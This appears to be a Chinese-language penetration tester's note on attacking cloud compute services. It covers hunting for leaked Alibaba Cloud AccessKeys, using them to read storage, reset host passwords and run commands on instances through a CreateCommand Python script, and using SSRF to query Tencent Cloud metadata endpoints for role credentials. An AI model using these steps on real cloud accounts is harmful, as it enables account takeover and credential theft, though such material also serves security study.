🐹弹性计算服务攻防

内容过时，不再适应当前环境， Time：2023.11.5 研究一些新的内容暂不对外

• 阅读产品文档、阅读架构文档、了解相关操作手册，了解产品功能模块

• 常规渗透一样子域名查找、端口扫描、目录扫描、指纹识别等，在查找的过程中留意AccessKey等密钥，会在APK文件、Github关键词、Web页面、JS文件、常规配置文件

• 云主机的应用漏洞（SSRF、RCE、本地文件读取等常规漏洞）

• 云产品的默认配置

  • OSS文件存储服务，默认设置为开放，导致文件任意下载

  • 端口默认对外0.0.0.0/0公网开放

AccessKey泄漏利用

渗透场景：

• APK文件中存放Access Key；

• Web页面/JS文件/phpinfo等;

• Github查找目标关键字发现AccessKey与AccessKey Secret；

• 拥有WebShell低权限的情况下搜集阿里云Access Key利用；

使用行云管家直接导入，获取OSS数据：

可直接获取阿里云主机进行重置密码等操作：

OpenAPI Explorer调用

在线API调用操作：

https://api.aliyun.com/#/?product=Ecs&api=DescribeRegions

调用CreateCommand新建一条云助手命令，CreateCommand.py

Name随便写

Type类型：

可以创建以下类型的命令：

• Windows实例适用的Bat脚本（RunBatScript）

• Windows实例适用的PowerShell脚本（RunPowerShellScript）

• Linux实例适用的Shell脚本（RunShellScriptCommandContent

该参数的值必须使用Base64编码后传输，且脚本内容的大小在Base64编码之后不能超过16KB。

#!/usr/bin/env python
#coding=utf-8
 
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest
client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing')
request = CreateCommandRequest()
request.set_accept_format('json')
request.set_Name("test1")
request.set_Type("RunShellScript")
request.set_CommandContent("aWZjb25maWc=")
response = client.do_action_with_exception(request)
# python2: print(response)
print(str(response, encoding='utf-8

常用脚本：

• DescribeSecurityGroups

查询您创建的安全组的基本信息，例如安全组ID和安全组描述等。返回列表按照安全组ID降序排列。

• DescribeCommands

查询您已经创建的云助手命令

• DescribeRegions

查询您可以使用的阿里云地域。

• DescribeInstances

查询一台或多台ECS实例的详细信息。

• GetInstanceConsoleOutput

获取一台实例的系统命令行输出，数据以Base64编码后返回。

• DescribeSnapshotPackage

查询您在一个阿里云地域下已经购买的对象存储OSS存储包，存储包可以用于抵扣快照存储容量。

• GetInstanceScreenshot

获取实例的截屏信息。

• ExportImage

导出您的自定义镜像到与该自定义镜像同一地域的OSS Bucket

• InvokeCommand

为一台或多台ECS实例触发一条云助手命令。

• RunCommand

图形化操作

无脑操作【推荐】

https://github.com/mrknow001/aliyun-accesskey-Tools

SSRF查看实例元数据

实例元数据是云服务器（如亚马逊 AWS 云、阿里云、腾讯云等）提供的一种特殊的 Web 服务，它允许云服务器上的实例在内部网络内查询它们的元数据，例如它们的内网 IP 地址、安全组、密钥对等信息。可以结合SSRF漏洞一起使用。

https://cloud.tencent.com/document/product/213/4934

http://metadata.tencentyun.com/latest/meta-data/  

获取 metadata 版本信息。
查询实例元数据。
 
http://metadata.tencentyun.com/latest/meta-data/placement/region
获取实例物理所在地信息。
 
http://metadata.tencentyun.com/latest/meta-data/local-ipv4
获取实例内网 IP。实例存在多张网卡时，返回 eth0 设备的网络地址。
 
http://metadata.tencentyun.com/latest/meta-data/public-ipv4
获取实例公网 IP。
 
http://metadata.tencentyun.com/network/interfaces/macs/${mac}/vpc-id
实例网络接口 VPC 网络 ID。
 
在获取到角色名称后，可以通过以下链接取角色的临时凭证，${role-name} 为CAM 角色的名称：
http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/${role-name}